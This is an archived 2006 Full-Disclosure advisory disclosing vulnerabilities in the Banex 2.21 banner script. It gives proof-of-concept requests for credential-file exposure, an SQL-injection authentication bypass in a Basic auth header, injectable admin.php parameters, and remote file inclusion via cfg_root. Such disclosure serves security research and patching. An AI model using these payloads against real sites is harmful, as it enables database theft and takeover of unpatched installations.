lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <8ba534860607292142v59450c31l430d65424ca3967b@mail.gmail.com>
Date: Sat, 29 Jul 2006 23:42:36 -0500
From: SirDarckCat <sirdarckcat@...il.com>
To: vuldb@...urityfocus.com, vuln@...unia.com,
	full-disclosure@...ts.grok.org.uk
Cc: 
Subject: Banex Multiple Vulnerabilities

Discovered by Sirdarckcat from elhacker.net

Banex 2.21
http://sourceforge.net/projects/banex
==============================================

Banex is a simple script for sharing Banners
through multiple webs.

Anyway it has multiple vulnerabilities.

==============================================
1.- Sensitive Information Disclosure

PoC:
http://www.server.com/inc/lib.inc

No protection, and contains the DB name password and user.

==============================================

2.- SQL injection


PoC:

GET /admin.php HTTP/1.1
Host: www.server.com
Authentication: Basic: YWRtaW4nIE9SIDE9MS8qOnA=

==============================================

3.- SQL injection

PoC:
http://www.server.com/signup.php?signup=1&user_pw=2&passwordconfirm=2&user_name=3&name=3&email=3&site_url=3&site_name='[SQL]/
*

==============================================

4.- SQL injection **** AUN CON MAGIC ON ****

PoC:
GET /admin.php?activatebanner&id=-1%20[SQLi] HTTP/1.1
Host: www.server.com
Authentication: Basic: YWRtaW4nIE9SIDE9MS8qOnA=


Same bug in context SELECT:
/admin.php?activateuser&id='+[SQL]
/admin.php?deleteunuser&id='+[SQL]
/admin.php?deleteuserbanner&deleteuserbanner='+[SQL]
/admin.php?deleteuserbanner&deleteuserbanner='+[SQL]
/admin.php?viewmem&viewmem='+[SQL]
/admin.php?viewmemunb&viewmemunb='+[SQL]
/admin.php?viewunmem&viewunmem='+[SQL]

Same bug, in context DELETE:
/admin.php?deletebanner&id=-1+[SQL]
/admin.php?activateuser&deleteuser='+[SQL]
/admin.php?deleteuserbanner&deleteuserbanner='+[SQL]

==============================================

5.- Remote File Inclusion:

PoC:
http://www.server.com/members.php?cfg_root=http://www.google.com/?


==============================================

Att.
Sirdarckcat
elhacker.net


-- 
Att.
SirDarckCat@...il.com

http://www.google.com/search?q=sirdarckcat

Content of type "text/html" skipped

View attachment "banex.txt" of type "text/plain" (1811 bytes)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ